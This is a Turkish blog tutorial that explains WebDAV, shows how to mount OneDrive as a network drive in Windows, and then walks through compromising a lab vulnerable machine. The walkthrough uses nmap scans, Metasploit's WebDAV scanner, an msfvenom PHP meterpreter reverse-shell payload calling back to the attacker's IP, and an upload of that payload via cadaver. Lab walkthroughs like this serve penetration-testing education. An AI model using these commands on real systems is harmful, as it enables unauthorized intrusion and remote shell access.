Siber Güvenlik

WebDav Nedir Ve Zafiyetli Makine İle İstismarı

Reklam

WebDav Nedir Ve Zafiyetli Makine İle İstismarı

Konunun Başlığından da Anlaşılıcağı Üzere İlk Önce WebDav Hakkında Gerekli Bilgileri sunuyoruz. Sonrasında bunun nerelerde kullanıldığı hakkında bilgi veriyorum. OneDrive Üzerinden Windows işletim sistemini kullanarak erişim sağlıycaz. En sonunda da gerekli bilgiye sahip olduğumuzda Bu sisteme Zaafiyetli bir makine üzerinden nasıl sızılabiliceğini Gösteriyorum. O zaman Hadi Konu ya Başlıyalım.

WebDav Nedir?

Web Distributed Authoring and Versioning (Web Dağıtımlı Yayın ve Sürümleme ) , World Wide Web (WWW) sunucularında depolanmış belge ve dosyaları düzenleme veya yönetmede kullanıcılar arasında işbirliğini kolaylaştıran bir Hiper Metin Aktarım Protokolü (HTTP) uzantısıdır.

Yani Bize Sunulan Depolama sistemlerinin Kısaca Bulut sistemine Erişimi üzerinde dosya aktarımının sağlanması veya düzenlenmesi olarak ifade edebiliriz. Kısaca sunucu üzerinden doküman oluşturma, düzenleme ve taşıma gibi işlemleri gerçekleştirebiliceğimiz bir sistemdir. Bu olay İnternet Mühendisliği Görev Gücü (IETF) tarafından RFC 4918 ile tanımlanmıştır. 80 ve 443 bağlantı noktalarında çalışmaktadır.

Nerelerde Kullanılır?

Google Drive , OneDrive , OwnCloud , Yandexdisk vs. gibi Bulut sistemlerinde Kullanılmaktadır.

Bu sayede sunucuya bağlanıp Silme,Yazma,Kopyalama,Taşıma gibi birçok işlemleri yapabiliriz. Bunu üstelik sadece internet tarayıcısını kullanarak gerçekleştiriyoruz. Tek bununla yetinmiyoruz üstüne üstelik pc’nizden uzakta olsanız dahi ağ sürücüsü ile dosyalarınıza erişim sağlayabiliyorsunuz.

Peki Nasıl Erişim Sağlarız?

Ben Windows işletim sistemi ile OneDrive üzerinden bir Köprü Kurucam.

1.AŞAMA

İlk önce OneDrive’ın (Oturum Açma) Sayfasından e-posta ve şifremizi girip oturumumuzu açıyoruz.

OneDrive Login

2.AŞAMA

GİRİŞ yaptıktan sonra Karşımıza Dosyalarımız gelicek Ama burada üste kırmızı ile gösterdiğimiz yere çok dikkat etmenizi hatta bir yere bunu not alıp tarayıcımızı kapatmanızı istiyorum.

OneDrive

3.AŞAMA

Her kullanıcının idsi farklıdır, Bunun için not defterine bu değeri kaydettik. Şimdi ise “1541249C0187BC80” kaydettiğimiz Bu değeri https://d.docs.live.net/ adresinin sonuna ekliyoruz. Yani şöyle birşey oluyor.

https://d.docs.live.net/1541249C0187BC80

Şimdi bu değeri Kopyalıyoruz.

4.AŞAMA

Sırasıyla Windows10 da yada herhangi bir Windows sürümünde aynı işlemdir yaklaşık olarak,

Bu Bilgisayar > Ağ sürücüsüne Bağlan > Bağlan seçeneğine Tıklıyoruz.

Bağlantı

5.AŞAMA

Karşımıza bir Pencere Geliyor. Burda Sürücümüzü seçip, Klasör bölümüne üste belirttiğimiz https://d.docs.live.net/1541249C0187BC80 yazıyoruz. Alttaki Seçeneklere tik atarak Son Diyoruz.

Ağ Bağlantısı

6.AŞAMA

Sunucumuz İle iletişime Geçiyor. Ve karşımıza Bir Pencere Geliyor. Bizden OneDrive adresine Giriş Yapar gibi kullanıcı adı ve şifremizin girmemizi istiyor. Böylece kullanıcı id’si ne ait kullanıcı olup olmadığımızı tespit edicek.

Ağ Bağlantısı 2
Ağ Bağlantısı 3

7.AŞAMA

VE işlem Bu kadar arkadaşlar artık sunucumuza bağlandık. Görselde gördüğünüz gibi tarayıcıdaki dosyalar artık Pc’miz de yer alıyor. İsterse Silebilir,ister taşıyabilir , isterse Düzenleme Yapabiliriz Hayal gücünüze Kalmış.

Dosyalar

Zafiyetli Makineye Sızma İşlemi

1.AŞAMA

Zafiyetli Makinemizi Açıyoruz.

Zafiyetli Makine
Zafiyetli Makine Girişi

2.AŞAMA

Şimdi Gördüğünüz Gibi Makinemizin ip adresi 192.168.1.5

Zafiyetli Makine 2

Kali Linux İşletim Sistemimizde Ağdaki Pclere Bakıyoruz.

netdiscover

Netdiscover

3.AŞAMA

Zafiyetli Makine üzerinde açık portların araştırması;

nmap -sS -sV 192.168.1.5

Nmap Taraması

İnternet Adresinden Bakalım 80 portuna  tarayıcıya 192.168.1.5:80 yazıyoruz.

Metasploitable2

Gördüğünüz gibi WebDav için Ayrılmış Klasör var.

4.AŞAMA

80.portdaki WebDav kısmını detaylı bir araştırma yapalım.

nmap -sS -sV  -A -p 80 192.168.1.5

gördüğünüz gibi 192.168.1.5/dav/ olduğunu gösteriyor.

Nmap Taraması 2
İndex

5.AŞAMA

WebDav sunucunun olup olmadığını metasploit ile de öğrene biliriz.

 msfconsole yazıyoruz.Metasploit açıyoruz.

use auxiliary/scanner/http/webdav_scanner

show options

set PATH /dav/

set RHOSTS 192.168.1.5

run

[+] 192.168.1.5 (Apache/2.2.8 (Ubuntu) DAV/2) has WEBDAV ENABLED sonucunu alıyoruz.

Metasploit

6.AŞAMA

Zafiyeli Makineye Sızabiliceğimiz bir arka kapı açmamız lazım.

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f raw > meterpreter.php

Lhost ile belirtilen bizim ip adresimiz böylece açıldığında otomatikman bize arka kapı açmış olucak.

Msfvenom

Ardından msfconsole açıyoruz. Sırasıyla;

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST 192.168.1.7

exploit diyerek dinlemeye alıyoruz.

Msfvenom 2

7.AŞAMA

Şimdi Bu webdav açığından yararlanarak sunucuya dosya zararlı meterpreter.php yüklüycez.

cadaver http://192.168.1.7/dav

put meterpreter.php

Başarılı Şekilde Yüklendi.

Meterpreter Bağlantısı

GÖRDÜĞÜNÜZ GİBİ WebDav Klasörünün içinde meterpreter.php yüklü

Bağlantı

8.AŞAMA

Şimdi meterpreter.php açıyoruz. Ve dinlemeye aldığımda bizim makine ile iletişimine bakıyoruz. Gördüğünüz gibi meterpreter ekranı geldi. Sızma işlemimiz Başarılı oldu.

Metasploit Exploit
Etiketler
Daha Fazla Göster

Eren Öztürk

Sayısal düşünme yeteneği yüksek, sayılarla uğraşmaktan sıkılmayan, sosyal olaylara ilgili, Bir konuyu ayrıntılarına inerek, nedenlerini bulmaya yönelik çalışmalardan hoşlanan, değişik görüşlere ve yeniliklere açık, Bir işi planlayabilme ve uygulamaya koyabilme, uzak görüşlü olma gibi özelliklere sahip olduğumu düşünüyorum.

İlgili Makaleler

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir